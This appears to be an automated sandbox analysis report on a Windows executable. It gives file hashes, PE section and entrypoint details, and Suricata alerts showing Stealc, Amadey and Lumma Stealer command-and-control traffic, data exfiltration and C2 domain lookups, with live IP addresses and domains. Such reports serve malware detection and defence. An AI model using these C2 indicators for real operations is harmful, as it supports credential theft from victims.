                                                                                                                                                                                                                                                                                        SHA-512:8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.gyN29IQRsEA.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTthb_7uL8fi0CBKDba3xi6R0PUU9w"
                                                                                                                                                                                                                                                                                        Preview:.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

                                                                                                                                                                                                                                                                                        Chrome Cache Entry: 112

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                        Size (bytes):1660
                                                                                                                                                                                                                                                                                        Entropy (8bit):4.301517070642596
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
                                                                                                                                                                                                                                                                                        MD5:554640F465EB3ED903B543DAE0A1BCAC
                                                                                                                                                                                                                                                                                        SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
                                                                                                                                                                                                                                                                                        SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
                                                                                                                                                                                                                                                                                        SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        URL:https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
                                                                                                                                                                                                                                                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

                                                                                                                                                                                                                                                                                        \Device\ConDrv

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1005561001\crypted.exe
                                                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):13
                                                                                                                                                                                                                                                                                        Entropy (8bit):3.0269868333592873
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:3:DSFy:DSc
                                                                                                                                                                                                                                                                                        MD5:8F86A092864CAAC078DBF24C006BF9B8
                                                                                                                                                                                                                                                                                        SHA1:AFE20BFB13265D4A67EB79710288E59AF2795507
                                                                                                                                                                                                                                                                                        SHA-256:5D5D099455FB20EECDDC875875E35EC65ED1A6049E724D33F510E35CC3BFF2CC
                                                                                                                                                                                                                                                                                        SHA-512:C883FE65419450C621422241EC1AA81B2F57DBA92D66F26B637D46A6C7E8185D9CAAC4289CF6090B328FA3B4733EEA8B43E485BEFC7A5665A68126BEA19ACA56
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Preview:sihxuiAsuia..

                                                                                                                                                                                                                                                                                        Static File Info

                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                        Entropy (8bit):7.945562116457548
                                                                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                        File name:file.exe
                                                                                                                                                                                                                                                                                        File size:1'802'752 bytes
                                                                                                                                                                                                                                                                                        MD5:fe83cbc9270910772b2028f38444bb7f
                                                                                                                                                                                                                                                                                        SHA1:b9a3fd9e948b88a25c4c588c6e01fb3bd129902b
                                                                                                                                                                                                                                                                                        SHA256:d541c198374d012b7c58b1231b78818194dda9f43e8758df7b2a2e723f97b86b
                                                                                                                                                                                                                                                                                        SHA512:d1e3dbae8dfef1dd0689e37471277de47a35c8e102bf44b7be931231e94b1faa6f5803f9cb1fc8ada2792531f48c761375bd2199b267a0ad97bcfef7adf3e06b
                                                                                                                                                                                                                                                                                        SSDEEP:49152:qwPreIPGaMFhWe/GFSHb5L2aoVU+qzg3gHVf1S:rTeIPxq5poU5gAZ1S
                                                                                                                                                                                                                                                                                        TLSH:E78533E24C9B597FEF5086F5D480050D6DF4207DA2B68A0D167FB72A2A93A06FE0D721
                                                                                                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..

                                                                                                                                                                                                                                                                                        File Icon

                                                                                                                                                                                                                                                                                        Icon Hash:90cececece8e8eb0

                                                                                                                                                                                                                                                                                        Static PE Info

                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                        Entrypoint:0xa94000
                                                                                                                                                                                                                                                                                        Entrypoint Section:.taggant
                                                                                                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                        Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                                                                                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                                                                        OS Version Major:5
                                                                                                                                                                                                                                                                                        OS Version Minor:1
                                                                                                                                                                                                                                                                                        File Version Major:5
                                                                                                                                                                                                                                                                                        File Version Minor:1
                                                                                                                                                                                                                                                                                        Subsystem Version Major:5
                                                                                                                                                                                                                                                                                        Subsystem Version Minor:1
                                                                                                                                                                                                                                                                                        Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                                                                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                                                                                        jmp 00007F4000FCB18Ah
                                                                                                                                                                                                                                                                                        punpcklbw mm3, qword ptr [ebx]
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add cl, ch
                                                                                                                                                                                                                                                                                        add byte ptr [eax], ah
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [esi], al
                                                                                                                                                                                                                                                                                        or al, byte ptr [eax]
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], dl
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [edx], al
                                                                                                                                                                                                                                                                                        or al, byte ptr [eax]
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [esi], al
                                                                                                                                                                                                                                                                                        or al, byte ptr [eax]
                                                                                                                                                                                                                                                                                        add byte ptr [edx], al
                                                                                                                                                                                                                                                                                        or al, byte ptr [eax]
                                                                                                                                                                                                                                                                                        add byte ptr [edx], cl
                                                                                                                                                                                                                                                                                        or al, byte ptr [eax]
                                                                                                                                                                                                                                                                                        add byte ptr [ecx], cl
                                                                                                                                                                                                                                                                                        or al, byte ptr [eax]
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax+eax*4], cl
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        adc byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        push es
                                                                                                                                                                                                                                                                                        or al, byte ptr [eax]
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al

                                                                                                                                                                                                                                                                                        Rich Headers

                                                                                                                                                                                                                                                                                        Programming Language:
                                                                                                                                                                                                                                                                                        • [C++] VS2010 build 30319
                                                                                                                                                                                                                                                                                        • [ASM] VS2010 build 30319
                                                                                                                                                                                                                                                                                        • [ C ] VS2010 build 30319
                                                                                                                                                                                                                                                                                        • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                        • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                        • [LNK] VS2010 build 30319

                                                                                                                                                                                                                                                                                        Data Directories

                                                                                                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x24b04d0x61.idata
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x24b1f80x8.idata
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                                        Sections

                                                                                                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                                        0x10000x2490000x162007ab93cb40a345d863de9e4471e5897eaunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                        .rsrc 0x24a0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                        .idata 0x24b0000x10000x2000d0399d83a742d5d86c5718841e8e842False0.134765625data0.8646718654202081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                        0x24c0000x2a80000x2005b87ba9994b34c605ca94996222920c1unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                        gcuyxxju0x4f40000x19f0000x19e600eaaf265e7ca419a21bf59b79e63dca0aFalse0.9948376225490196data7.953797112174641IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                        busnlrvl0x6930000x10000x40091cf2be1909f9b222346986e7b047addFalse0.802734375data6.251430032900451IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                        .taggant0x6940000x30000x22003ab79e2ebf9feda18564f7de399bec2bFalse0.06295955882352941DOS executable (COM)0.7744627309100303IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                                                                                                                                                                        Imports

                                                                                                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                                                                                                        kernel32.dlllstrcpy

                                                                                                                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                                                                                                                        Suricata IDS Alerts

                                                                                                                                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                                        2024-11-11T16:36:01.871013+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730185.215.113.20680TCP
                                                                                                                                                                                                                                                                                        2024-11-11T16:36:02.074655+01002044244ET MALWARE Win32/Stealc Requesting browsers Config from C21192.168.2.449730185.215.113.20680TCP
                                                                                                                                                                                                                                                                                        2024-11-11T16:36:02.081235+01002044245ET MALWARE Win32/Stealc Active C2 Responding with browsers Config1185.215.113.20680192.168.2.449730TCP
                                                                                                                                                                                                                                                                                        2024-11-11T16:36:02.278799+01002044246ET MALWARE Win32/Stealc Requesting plugins Config from C21192.168.2.449730185.215.113.20680TCP
                                                                                                                                                                                                                                                                                        2024-11-11T16:36:02.285434+01002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config1185.215.113.20680192.168.2.449730TCP
                                                                                                                                                                                                                                                                                        2024-11-11T16:36:03.216769+01002044248ET MALWARE Win32/Stealc Submitting System Information to C21192.168.2.449730185.215.113.20680TCP
                                                                                                                                                                                                                                                                                        2024-11-11T16:36:03.961913+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449730185.215.113.20680TCP
                                                                                                                                                                                                                                                                                        2024-11-11T16:36:16.046963+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449753185.215.113.20680TCP
                                                                                                                                                                                                                                                                                        2024-11-11T16:36:16.779468+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.449756TCP
                                                                                                                                                                                                                                                                                        2024-11-11T16:36:16.875047+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449753185.215.113.20680TCP
                                                                                                                                                                                                                                                                                        2024-11-11T16:36:17.294705+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449753185.215.113.20680TCP
                                                                                                                                                                                                                                                                                        2024-11-11T16:36:17.571881+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449753185.215.113.20680TCP
                                                                                                                                                                                                                                                                                        2024-11-11T16:36:18.073327+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449753185.215.113.20680TCP
                                                                                                                                                                                                                                                                                        2024-11-11T16:36:18.410658+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449753185.215.113.20680TCP
                                                                                                                                                                                                                                                                                        2024-11-11T16:36:21.943241+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449762185.215.113.1680TCP
                                                                                                                                                                                                                                                                                        2024-11-11T16:36:54.666618+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.449763TCP
                                                                                                                                                                                                                                                                                        2024-11-11T16:37:06.411212+01002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.449829185.215.113.4380TCP
                                                                                                                                                                                                                                                                                        2024-11-11T16:37:09.174630+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44985187.120.125.25480TCP
                                                                                                                                                                                                                                                                                        2024-11-11T16:37:13.611687+01002856122ETPRO MALWARE Amadey CnC Response M11185.215.113.4380192.168.2.449845TCP
                                                                                                                                                                                                                                                                                        2024-11-11T16:37:14.252962+01002856121ETPRO MALWARE Amadey CnC Activity M21192.168.2.449887185.215.113.4380TCP
                                                                                                                                                                                                                                                                                        2024-11-11T16:37:14.908802+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44989331.41.244.1180TCP
                                                                                                                                                                                                                                                                                        2024-11-11T16:37:18.749368+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449923185.215.113.4380TCP
                                                                                                                                                                                                                                                                                        2024-11-11T16:37:19.416579+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449929185.215.113.1680TCP
                                                                                                                                                                                                                                                                                        2024-11-11T16:37:21.444710+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44994023.192.247.89443TCP
                                                                                                                                                                                                                                                                                        2024-11-11T16:37:21.951917+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.44994023.192.247.89443TCP
                                                                                                                                                                                                                                                                                        2024-11-11T16:37:23.537879+01002057131ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store)1192.168.2.4526671.1.1.153UDP
                                                                                                                                                                                                                                                                                        2024-11-11T16:37:23.566312+01002057129ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store)1192.168.2.4561711.1.1.153UDP
                                                                                                                                                                                                                                                                                        2024-11-11T16:37:23.589654+01002057127ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store)1192.168.2.4529081.1.1.153UDP
                                                                                                                                                                                                                                                                                        2024-11-11T16:37:23.630836+01002057125ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store)1192.168.2.4646641.1.1.153UDP
                                                                                                                                                                                                                                                                                        2024-11-11T16:37:23.699465+01002057123ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store)1192.168.2.4540591.1.1.153UDP
                                                                                                                                                                                                                                                                                        2024-11-11T16:37:23.730747+01002057121ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store)1192.168.2.4559941.1.1.153UDP
                                                                                                                                                                                                                                                                                        2024-11-11T16:37:23.751524+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449963185.215.113.4380TCP
                                                                                                                                                                                                                                                                                        2024-11-11T16:37:23.756481+01002057119ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (navygenerayk .store)1192.168.2.4560631.1.1.153UDP
                                                                                                                                                                                                                                                                                        2024-11-11T16:37:23.783339+01002057101ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scriptyprefej .store)1192.168.2.4633001.1.1.153UDP
                                                                                                                                                                                                                                                                                        2024-11-11T16:37:24.406686+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449970185.215.113.1680TCP
                                                                                                                                                                                                                                                                                        2024-11-11T16:37:24.476049+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44997123.192.247.89443TCP
                                                                                                                                                                                                                                                                                        2024-11-11T16:37:25.004264+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.44997123.192.247.89443TCP
                                                                                                                                                                                                                                                                                        2024-11-11T16:37:25.477188+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449982188.114.96.3443TCP
                                                                                                                                                                                                                                                                                        2024-11-11T16:37:25.971041+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449982188.114.96.3443TCP
                                                                                                                                                                                                                                                                                        2024-11-11T16:37:25.971041+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449982188.114.96.3443TCP
                                                                                                                                                                                                                                                                                        2024-11-11T16:37:26.464674+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449988188.114.96.3443TCP
                                                                                                                                                                                                                                                                                        2024-11-11T16:37:27.118954+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449988188.114.96.3443TCP
                                                                                                                                                                                                                                                                                        2024-11-11T16:37:27.118954+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449988188.114.96.3443TCP
                                                                                                                                                                                                                                                                                        2024-11-11T16:37:28.043561+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450003188.114.96.3443TCP
                                                                                                                                                                                                                                                                                        2024-11-11T16:37:28.161316+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.450001185.215.113.4380TCP
                                                                                                                                                                                                                                                                                        2024-11-11T16:37:29.656585+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450015188.114.96.3443TCP
                                                                                                                                                                                                                                                                                        2024-11-11T16:37:30.917209+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.450023185.215.113.20680TCP
                                                                                                                                                                                                                                                                                        2024-11-11T16:37:30.920055+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450028188.114.96.3443TCP
                                                                                                                                                                                                                                                                                        2024-11-11T16:37:32.072986+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.450036185.215.113.4380TCP
                                                                                                                                                                                                                                                                                        2024-11-11T16:37:32.725785+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.450043185.215.113.1680TCP
                                                                                                                                                                                                                                                                                        2024-11-11T16:37:32.784785+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450044188.114.96.3443TCP
                                                                                                                                                                                                                                                                                        2024-11-11T16:37:33.158987+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.450044188.114.96.3443TCP
